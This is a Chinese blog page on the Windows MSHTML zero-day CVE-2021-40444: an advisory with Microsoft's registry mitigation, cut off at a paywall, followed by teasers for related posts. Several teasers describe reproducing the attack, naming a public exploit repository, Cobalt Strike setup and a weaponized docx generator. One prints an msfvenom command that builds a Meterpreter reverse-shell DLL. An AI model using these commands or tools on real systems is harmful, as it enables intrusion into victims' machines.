CVE-2021-40444:Windows MSHTML 0day漏洞利用

最新推荐文章于 2026-06-23 12:19:31 发布
原创 最新推荐文章于 2026-06-23 12:19:31 发布 · 1.1k 阅读 · 1
标签
#windows #网络安全 #安全漏洞
研究人员揭示了Windows MSHTML组件中的0day漏洞CVE-2021-40444,此漏洞可能导致远程代码执行。攻击者通过诱使受害者打开恶意Office文件,利用精心构造的ActiveX控件进行系统感染。目前微软已提供临时修复措施,包括通过注册表禁用ActiveX控件安装和使用IE或Office的保护模式。

研究人员发现Windows MSHTML 0day漏洞利用,微软发布预防措施。

近日,多个安全研究人员向微软分别报告了MSHTML中的一个0 day远程代码执行漏洞。并发现了该漏洞的在野利用攻击活动。

MSHTML是Windows中用来渲染web页面的软件组件。虽然主要与IE相关,但也用于其他版本,包括Skype、Outlook、Visual Studio等。

CVE-2021-40444

研究人员在MSHTML中发现的0 day漏洞CVE编号为CVE-2021-40444,cvss评分为8.8分。由于MSHTML 是IE的核心之一,该漏洞也存在于IE浏览器中。攻击依赖于受害者打开一个恶意office文件时,MSHTML加载一个精心伪造的ActiveX控件。加载的ActiveX 控件可以运行任意代码来感染系统。所以攻击者需要诱使受害者打开恶意文档。由于没有发布补丁,关于漏洞的更多技术细节尚未公开。

修复措施

目前,所有支持的Windows版本都受到该漏洞的影响,而且微软发现有利于该漏洞的在野攻击,但目前还没有补丁,因此微软提出多种方法来拦截相关的攻击活动。

◼通过注册表禁用所有ActiveX 控件的安装。之前安装的ActiveX 控件仍然可以运行,但是不会再新增控件。禁用ActiveX 控件的方式如下,复制一下内容到文本文件中,并保存为.reg文件扩展:

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]
"1001"
最低0.47元/天 解锁文章
CVE-2021-40444分析报告微软MHTML远程命令执行漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-02 1576
CVE-2021-40444漏洞概述.2021 年 8 月 21 日,MSTIC 观察到一名 Mandiant 员工在社交媒体上发布的帖子,该员工具有跟踪 Cobalt Strike Beacon 基础设施的经验。所写文章重点介绍了一个于 2021 年 8 月 19 日上传到 VirusTotal的 Microsoft Word 文档(SHA-256:3bddb2e1a85a9e06b9f9021ad301fdcde33e197225ae1676b8c6d0b416193ecf)。 MSTIC 对样本进行了
Microsoft MSHTML远程代码执行(CVE-2021-40444)
huayimy的博客
02-03 468
Microsoft MSHTML远程代码执行(CVE-2021-40444).攻击者利用漏洞,通过精心构造包含可被加载的恶意 ActiveX控件的Microsoft Office文件,并诱导受害者打开文档,从而触发此漏洞。未经身份验证的攻击者利用漏洞,可获得受害者的当前用户权限,以该用户权限执行任意代码。打开后,靶机计算器被成功调用,至此漏洞利用成功。
CVE-2021-40444 0 day漏洞利用
HBohan的博客
09-13 4845
9月7日,微软发布安全公告称发现Windows IE MSHTML中的一个远程代码执行漏洞CVE编号为CVE-2021-40444。由于未发布漏洞补丁,微软只称该漏洞可以利用恶意ActiveX控制来利用office 365和office 2019来在受影响的Windows 10主机上下载和安装恶意软件。 随后,研究人员发现有攻击活动使用该恶意word文档,即该漏洞的0 day在野利用。 当office打开一个文档后,会检查是否标记为"Mark of the Web" (MoTW),这表示它来源于互联网。如
CVE-2021-4034(PwnKit)本地提权漏洞实战检测与修复指南
weixin_33935636的博客
05-22 575
Linux本地提权漏洞是系统安全的核心风险点,其本质源于特权程序对用户输入(如argv、环境变量)的校验缺失,进而触发堆溢出或权限绕过。这类漏洞往往隐蔽性强、检测难度高,传统版本号比对和静态扫描极易漏报,必须结合运行时行为分析与内存级验证。技术价值在于实现零日级响应能力——不依赖厂商补丁节奏,即可通过热补丁、wrapper拦截或策略收敛快速止血。典型应用场景覆盖运维日常(如pkexec调用)、桌面环境权限仲裁(Polkit策略执行)及自动化运维流水线加固。本文聚焦CVE-2021-4034这一标志性案例,深
CVE-2021-40444漏洞复现详细
热门推荐
weixin_51203422的博客
09-14 1万+
2021年9月8日,微软官方发布了MSHTML组件的风险通告(漏洞编号:CVE-2021-40444),未经身份验证的攻击者可以利用漏洞在目标系统上远程执行代码。微软官方表示已经监测到该漏洞存在在野利用。 1、漏洞详情: Microsoft MSHTML远程代码执行漏洞 CVE-2021-40444 严重级别:严重 CVSS:8.8 被利用级别:检测到利用 危害:未经身份验证的攻击者可以利用漏洞在目标系统上执行代码。 在野利用:微软表示已经发现攻击者利用漏洞。在Office文档中添...
CVE-2021-40444_复现
PureDust的博客
09-14 1185
CVE-2021-40444_Microsoft MSHTML 远程代码执行复现准备上线设置cs,powershell,端口设置了8080复制word_dat为tmp_doc制作dll文件 准备 1.下载github的代码 https://github.com/lockedbyte/CVE-2021-40444 2.安装lcab sudo apt-get install lcab 3.安装编译环境 apt-get install mingw-w64 上线 设置cs,powershell,端口设置了808
高危0day突袭!俄APT28借MSHTML漏洞CVE-2026-21513)突破安全防线,政企机构需紧急戒备
从零开始,掌握网络安全。提供全面的网络安全教程、攻防演练技巧和行业动态。
03-03 1760
CVE-2026-21513作为APT28在2026年初使用的高危零日漏洞,其利用手法巧妙、隐蔽性强、影响范围广,已成为该组织推进地缘政治博弈、实施定向攻击的重要工具。此次攻击不仅对乌克兰及东欧地区的核心机构造成了严重影响,也给全球政企机构敲响了警钟——在APT攻击日益常态化、复杂化的背景下,任何安全漏洞都可能成为攻击者突破防线的“突破口”。对于各类政企机构而言,当前最紧迫的任务是立即部署CVE-2026-21513漏洞补丁,采取有效的缓解措施,防范APT28的攻击;
Windows MSHTML远程代码执行漏洞风险通告更新,腾讯安全支持全面检测拦截
qcloud_security的博客
09-09 4331
2021年9月8日,微软官方发布风险通告,公开了一个有关Windows MSHTML 的远程代码执行漏洞。有攻击者试图通过使用特制的Office文档来利用漏洞,该漏洞风险为高,腾讯安全已捕获在野利用样本,腾讯安全全系列产品已支持对该漏洞的恶意利用进行检测拦截,建议Windows用户警惕来历不明的文件,避免轻易打开可疑文档。 漏洞详情: 2021年9月8日,微软官方发布风险通告,公开了一个有关Windows MSHTML的远程代码执行漏洞。攻击者通过使用特制的Office文档来利用漏洞,攻击者制作恶意
APT28利用MSHTML零日漏洞攻击剖析与纵深防御实战指南
最新发布
dfdfadsf3443的博客
06-23 345
高级持续性威胁(APT)攻击是当前网络安全领域面临的严峻挑战,其核心在于利用软件漏洞进行隐蔽、长期的网络渗透。攻击原理往往涉及内存破坏类漏洞,如释放后使用(UAF),攻击者通过精心构造的恶意文档或网页内容触发漏洞,从而在目标系统上执行任意代码,实现初始入侵。这类攻击的技术价值在于其极高的隐蔽性和破坏性,能够绕过传统基于签名的防御,直接威胁政府、能源、国防等关键信息基础设施的安全。在实际应用场景中,攻击链通常包含初始入侵、载荷投递、横向移动和数据渗出等多个阶段。针对此次APT28组织利用MSHTML引擎零日漏
CVE-2021-40444-Microsoft MSHTML远程命令执行漏洞分析(三)
include_voidmain的博客
06-30 704
CVE-2021-40444-Microsoft MSHTML远程命令执行漏洞分析(三)
RCE高危漏洞预警:CVE-2021-40444简要分析
「鸿渐之翼」的博客
09-24 2425
漏洞影响及其危害:未经身份验证的攻击者可以利用漏洞在目标系统上执行代码。 Microsoft发布了一份关于此漏洞的官方公告。 这篇博客文章讨论了该漏洞如何发挥作用.。 我们已获得多个利用漏洞的文档样本。文档包中的document.xml.rels文件中都包含以下代码: 请大家主要,存在一个URL(我们已删除),该URL下载一个名为side.html的文件(SHA-256:D0FD7ACC38B3105FACD699534242F28E45F5380FDF2EC93EA24BFBC1DC9E6)。该文件
CVE-2021-40444漏洞复现
1ance's blog
09-25 4198
简介 MSHTML(又称Trident)是微软Windows操作系统Internet Explorer(IE)浏览器的排版组件。软件开发人员使用该组件,可以在应用中快速实现网页浏览功能。MSHTML除应用于IE浏览器、IE内核浏览器外,还在Office的Word、Excel和PowerPoint文档中用来呈现Web托管内容。 9月7日,微软公司发布了针对Microsoft MSHTML远程代码执行漏洞的紧急安全公告。攻击者利用漏洞,通过精心构造包含可被加载的恶意 ActiveX控件的Microsoft O
利用CVE-2021-40444漏洞钓鱼执法上线MSF
include_voidmain的博客
03-31 3558
0x01 漏洞描述 2021年9月8日,微软官方发布了关于MSHTML组件的风险通告(漏洞编号:CVE-2021-40444),未经身份验证的攻击者可以利用漏洞在目标系统上远程执行代码。微软官方表示已经监测到该漏洞存在在野利用。 Microsoft 发现,存在尝试通过特别设计的 Microsoft Office 文档利用漏洞的针对性攻击。攻击者可制作一个由托管浏览器呈现引擎的 Microsoft Office 文档使用的恶意 ActiveX 控件。然后,攻击者必须诱使用户打开此恶意文件。 0x02 漏洞
CVE-2021-40444
m0_73399576的博客
07-29 1259
知识面,决定看到的攻击面有多广。知识链,决定发动的杀伤链有多深。
漏洞深入分析-2021
dzqxwzoe的博客
02-04 1176
随着cve-2021-40444的披露,随机引爆了全球的网络安全,虽然最近微软发布了补丁,但是cve-2021-40444利用却越发猖狂。
漏洞复现|CVE-2021-40444(Microsoft MSHTML 远程代码执行漏洞
weixin_42282189的博客
09-24 1617
作者:墨阳 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 前言 微软MSHTML引擎存在代码执行漏洞,攻击者通过精心制作包含恶意ActiveX的Offcie文档,诱导用户打开,从而实现远程代码执行。当用户主机启用了ActiveX控件,攻击者可通过该漏洞控制受害者主机。 目前,该漏洞EXP已公开,微软官方公布已检测到在野利用,已发布修复补丁。 影响范围: Windows Server, version 20H2 (Server Core Installation) .
全面武装的CVE-2021-40444漏洞利用工具
gitblog_00078的博客
05-17 440
全面武装的CVE-2021-40444漏洞利用工具 去发现同类优质开源项目:https://gitcode.com/ 项目简介 Fully Weaponized CVE-2021-40444 是一个恶意docx文件生成器,它能够利用Microsoft Office Word中的CVE-2021-40444远程代码执行漏洞,并支持任意DLL文件。该工具最近已更新以支持最新的Follina攻击(通过m...
CVE-2021-40444复现
weixin_42345596的博客
09-16 2056
CVE-2021-40444 漏洞描述 2021年9月8日,微软发布安全通告披露了Microsoft MSHTML远程代码执行漏洞,攻击者可通过制作恶意的ActiveX控件供托管浏览器呈现引擎的 Microsoft Office文档使用,成功诱导用户打开恶意文档后,可在目标系统上以该用户权限执行任意代码,微软在通告中指出已检测到该漏洞被在野利用,请相关用户采取措施进行防护。 MSHTML(又称为Trident)是微软旗下的Internet Explorer浏览器引擎,也用于Office应用程序,以在Word
CVE-2021-40444 复现
问题很多的小明
09-20 1805
利用过程:在Office文档中添加恶意ActiveX控件,以此来诱导目标用户打开恶意文档 复现环境:Ubuntu + WIN10 利用工具:Github:https://github.com/lockedbyte/CVE-2021-40444 0x01 生成恶意dll : msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=4444 -f dll > shell.dll 需要提前下载lcab库 .
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值